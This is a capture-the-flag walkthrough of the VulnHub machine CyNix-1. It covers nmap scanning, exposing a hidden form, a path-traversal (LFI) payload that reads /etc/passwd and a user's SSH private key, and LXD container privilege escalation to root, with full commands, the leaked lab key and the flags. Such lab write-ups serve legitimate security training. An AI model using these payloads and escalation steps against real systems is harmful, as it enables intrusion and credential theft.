vulnhub-walkthrough[CyNix-1]

注意

为了帮助自己更好的成长，适应国际潮流与发展。从这篇文章开始，本人以后所有的技术文章，walkthrough,writeup,及其他乱七八糟的东西，全部用英文，重要的事情强调3遍,全部用英文!全部用英文!全部用英文!以后为适应国际潮流，文章将不定期换用其它国家的语言！！！

name

Name: CyNix: 1
Date release: 18 Nov 2019

download

Download: https://drive.google.com/open?id=1oV8J4o3R8WP25fnIMy0ZKdZi-97eNP6b
Download (Mirror): https://download.vulnhub.com/cynix/CyNix.ova
Download (Torrent): https://download.vulnhub.com/cynix/CyNix.ova.torrent

description

• Level: Intermediate-Hard
• User flag: user.txt
• Root flag: root.txt
• Description: It’s a Boot2Root machine. The machine is VirtualBox compatible but can be used in VMWare as well (not tested but it should work). The DHCP will assign an IP automatically. You have to find and read two flags (user and root) which is present in user.txt and root.txt respectively. Enjoy pwning it!

We recommend that you use VirtualBox and not VMware for this VM

information gathering

first use nmap as usual

nmap -sn -v 192.168.56.*
Nmap scan report for 192.168.56.125
Host is up (0.00016s latency).
MAC Address: 08:00:27:FC:8E:E4 (Oracle VirtualBox virtual NIC)

then Get more detailed information

nmap -sV -sC -T4 -v -p- 192.168.56.125
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6688/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6d:df:0d:37:b1:3c:86:0e:e6:6f:84:b9:28:11:ee:68 (RSA)
|   256 8f:3e:c0:08:03:13:e8:64:89:f6:f9:63:b3:88:99:2a (ECDSA)
|_  256 fb:e3:40:e6:91:0b:3c:bc:b7:0e:c7:bd:ef:a2:93:fc (ED25519)
MAC Address: 08:00:27:FC:8E:E4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

• Enumeration

i use dirbuster for Web Directory scanning, get the following results

/icons    403
/lavalamp    200
/server-status    403

turn to contact page,i use burp got the following request

POST /lavalamp/canyoubypassme.php HTTP/1.1
Host: 192.168.56.125
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://192.168.56.125
Connection: close
Referer: http://192.168.56.125/lavalamp/

name=test&email=ccasdcasdcas%40qq.com&subject=fuckyou&message=wocaonimacasdcasdcasd

then go to

http://192.168.56.125/lavalamp/canyoubypassme.php

check the source code

<table width="40%" cellspacing="0" cellpadding="0" margin="20%" class="tb1" style="margin:2% 30%;opacity: 0.0;">
   <tr><td align=center style="padding: 3%;">
	<form method=post action="/lavalamp/canyoubypassme.php">Specify a number: <input type=text name=file placeholder=integer><br><br><input type=submit name=read value="Download the number"></form>

now change the opacity 0:0 to 1:0, and see what will happen

we got a visible form by doing that,then use burp intercept the data

POST /lavalamp/canyoubypassme.php HTTP/1.1
Host: 192.168.56.125
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.56.125
Connection: close
Referer: http://192.168.56.125/lavalamp/canyoubypassme.php
Upgrade-Insecure-Requests: 1

file=21212&read=Download+the+number

edit the poc to triggerthe LFI

file=1../../../etc/passwd&read=Download+the+number

responese:

 </td></tr></table>
				<div id="right"></div><div align=center><textarea rows=20 cols=60>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
ford:x:1000:1000:ford,,,:/home/ford:/bin/bash
lxd:x:106:65534::/var/lib/lxd/:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
sshd:x:108:65534::/run/sshd:/usr/sbin/nologin
</textarea>

edit again to read ford user’s ssh key

file=1../../../home/ford/.ssh/id_rsa&read=Download+the+number

and we got ford’s ssh key

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAk1VUtcYuZmM1Zmm4yNpguzzeocGpMVYC540yT90QqaD2Bsal
zYqvHKEh++bOL6QTSr0NjU9ifT/lBIVSIA0TpjUTkpdIW045H+NlgMhN0q/x6Yy2
LofuB4LQqRzr6cP0paoOYNq1KYG3QF1ouGa4k1i0td4DepBxcu4JBMOm20E7BurG
zo41f/YWjC5DurNjIchzl4GyBClMGSXWbIbr6sYwVx2OKyiPLFLYusrNqwJNQvxz
Mf5yolEYI8WOXJzCfiPQ5VG8KXBH3FHu+DhFNgrJQjgowD15ZMQ1qpO/2FMhewR6
gcDs7rCLUUXc9/7uJ7e3zHlUyDgxakYohn3YiQIDAQABAoIBAE/cfSJa3mPZeuSc
gfE9jhlwES2VD+USPljNDGyF47ZO7Y0WuGEFv43BOe6VWUYxpdNpTqM+WKCTtcwR
iEafT/tT4dwf7LSxXf2PAUIhUS3W+UYjY80tGTUxD3Hbn3UDJuV1nH2bj3+ENJTL
DSyHYZ1dA/dg9HnHOfeWV4UhmJxXmOAOKgU9Z73sPn4bYy4B3jnyqWn392MsQftr
69ZYauTjku9awpuR5MAXMJ9bApk9Q7LZYwwGaSZw8ceMEUj7hkZBtP9W9cilCOdl
rFXnkc8CvUpLh+hX6E/JOCGsUvdPuVLWKd2bgdK099GrRaenS8SlN0AUTfyNiqg4
VE7V8AECgYEAwoGVE+Z8Tn+VD5tzQ0twK+cP2TSETkiTduYxU3rLqF8uUAc3Ye/9
TLyfyIEvU7e+hoKltdNXHZbtGrfjVbz6gGuGehIgckHPsZCAQLPwwEqp0Jzz9eSw
qXI0uM7n2vSdEWfCAcJBc559JKZ5uwd0XwTPNhiUqe6DUDUOZ7kI34ECgYEAwenM
gMEaFOzr/gQsmBNyDj2gR2SuOYnOWfjUO3DDleP7yXYNTcRuy6ke1kvMhf9fWw7h
dq3ieU0KSHrNUQ9igFK5C8FvsB+HUyEjfVpNhFppNpWUUWKDRCypbmypLg0r+9I7
myrdBFoYv30WKVsEHus1ye4nJzKjCtkgmjYMfQkCgYA0hctcyVNt2xPEWCTC2j8b
C9UCwSStAvoXFEfjk/gkqjcWUyyIXMbYjuLSwNen0qk3J1ZaCAyxJ8009s0DnPlD
7kUs93IdiFnuR+fqEO0E7+R1ObzC/JMb3oQQF4cSYBV92rfPw8Xq07RVTkL21yd8
dQ8DO5YBYS/CW+Fc7uFPgQKBgHWAVosud792UQn7PYppPhOjBBw+xdPXzVJ3lSLv
kZSiMVBCWI1nGjwOnsD77VLFC+MBgV2IwFMAe9qvjvoveGCJv9d/v03ZzQZybi7n
KVGp91c8DEPEjgYhigl/joR5Ns3A9p1vu72HWret9F/a5wRVQqK5zL/Tzzgjmb3Y
QnkBAoGAVosEGOE7GzBMefGHjQGMNKfumeJ01+Av6siAI6gmXWAYBaU618XhFEh1
+QNoLgWvSXoBuN+pMkxnRCfMTNbD1wSk46tW3sWHkZdV31gKceOifNzMVw53bJHP
/kto0eGJ/vgM0g9eyqmcpPTVqf7EwkJdo0LngOprNyTk+54ZiUg=
-----END RSA PRIVATE KEY-----

then we easily get user.txt

root@kali:~/vulnhub/cynix# mousepad key
root@kali:~/vulnhub/cynix# chmod 700 key
root@kali:~/vulnhub/cynix# ssh -i key ford@192.168.56.125
ssh: connect to host 192.168.56.125 port 22: Connection refused
root@kali:~/vulnhub/cynix# ssh -i key ford@192.168.56.125 -p 6688
The authenticity of host '[192.168.56.125]:6688 ([192.168.56.125]:6688)' can't be established.
ECDSA key fingerprint is SHA256:4l9whYX6vUaC+OGLPBYRWd7sw10HKH1wJU+FcVVeJyQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.125]:6688' (ECDSA) to the list of known hosts.
 _____  _    _  ____  ______ _   _ _______   __
|  __ \| |  | |/ __ \|  ____| \ | |_   _\ \ / /
| |__) | |__| | |  | | |__  |  \| | | |  \ V / 
|  ___/|  __  | |  | |  __| | . ` | | |   > <  
| |    | |  | | |__| | |____| |\  |_| |_ / . \ 
|_|    |_|  |_|\____/|______|_| \_|_____/_/ \_\
                                               

Last login: Fri Nov  8 16:46:44 2019 from 10.80.3.41
ford@blume:~$ id
uid=1000(ford) gid=1000(ford) groups=1000(ford),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare),113(lxd)
ford@blume:~$ whoami
ford
ford@blume:~$ ls
user.txt
ford@blume:~$ cat user.txt
02d6267ed96e6b615b031dafe9607151

• 

lxd privilege escalation

reference to the following article

• lxd privilege escalation

use the following commands to build the lxd image for later useage

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

transfer alpine-v3.11-x86_64-20200119_0151.tar.gz to victim’s machine

root@kali:~/lxd-alpine-builder# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
192.168.56.125 - - [21/May/2020 00:51:58] "GET /alpine-v3.11-x86_64-20200119_0151.tar.gz HTTP/1.1" 200 -

ford@blume:/tmp$ wget http://192.168.56.126/alpine-v3.11-x86_64-20200119_0151.tar.gz
--2020-05-21 10:21:57--  http://192.168.56.126/alpine-v3.11-x86_64-20200119_0151.tar.gz
Connecting to 192.168.56.126:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3226602 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.11-x86_64-20200119_0151.tar.gz’

alpine-v3.11-x86_64-20200 100%[==================================>]   3.08M  --.-KB/s    in 0.06s   

2020-05-21 10:21:57 (50.3 MB/s) - ‘alpine-v3.11-x86_64-20200119_0151.tar.gz’ saved [3226602/3226602]

then added as an image to LXD as follows:

ford@blume:/tmp$ lxc image import ./alpine-v3.11-x86_64-20200119_0151.tar.gz --alias myimage
Image imported with fingerprint: 468c747448ec99c6b76e5a943df89a21489eb5d605ebe5d4c341a78ec217a223

Use the list command to check the list of images

ford@blume:/tmp$ lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | 468c747448ec | no     | alpine v3.11 (20200119_01:51) | x86_64 | 3.08MB | May 21, 2020 at 5:39am (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
ford@blume:/tmp$ lxc init myimage ignite -c security.privileged=true
Creating ignite
ford@blume:/tmp$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to ignite
ford@blume:/tmp$ lxc start ignite
ford@blume:/tmp$ lxc exec ignite /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # whoami
root

Once inside the container, navigate to /mnt/root to see all resources from the host machine.

After running the bash file. We see that we have a different shell, it is the shell of the container. This container has all the files of the host machine. So, we enumerated for the root flag and found it.

and finally find the root.txt at last

~ # cd /mnt/root/root
/mnt/root/root # ls
root.txt
/mnt/root/root # cat root.txt
Oh Yeah! Finally Pwned!

Here's your root flag:
b0f971eddce7bd007e9f50ca02f5fe11
    ____   __                      __    _  __ ______
   /  _/  / /____  _   __ ___     / /   | |/ // ____/
   / /   / // __ \| | / // _ \   / /    |   // /     
 _/ /   / // /_/ /| |/ //  __/  / /___ /   |/ /___   
/___/  /_/ \____/ |___/ \___/  /_____//_/|_|\____/   
                                                     
https://www.linkedin.com/in/sumit-verma-125576129/

• 

Summary of knowledge

• change the opacity 0:0 to 1:0 to show the form
• use LFI to read /etc/passwd and ssh key
• lxd privilege escalation

Contact me

• QQ: 1185151867
• twitter: https://twitter.com/fdlucifer11
• github: https://github.com/FDlucifer

I’m lucifer11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…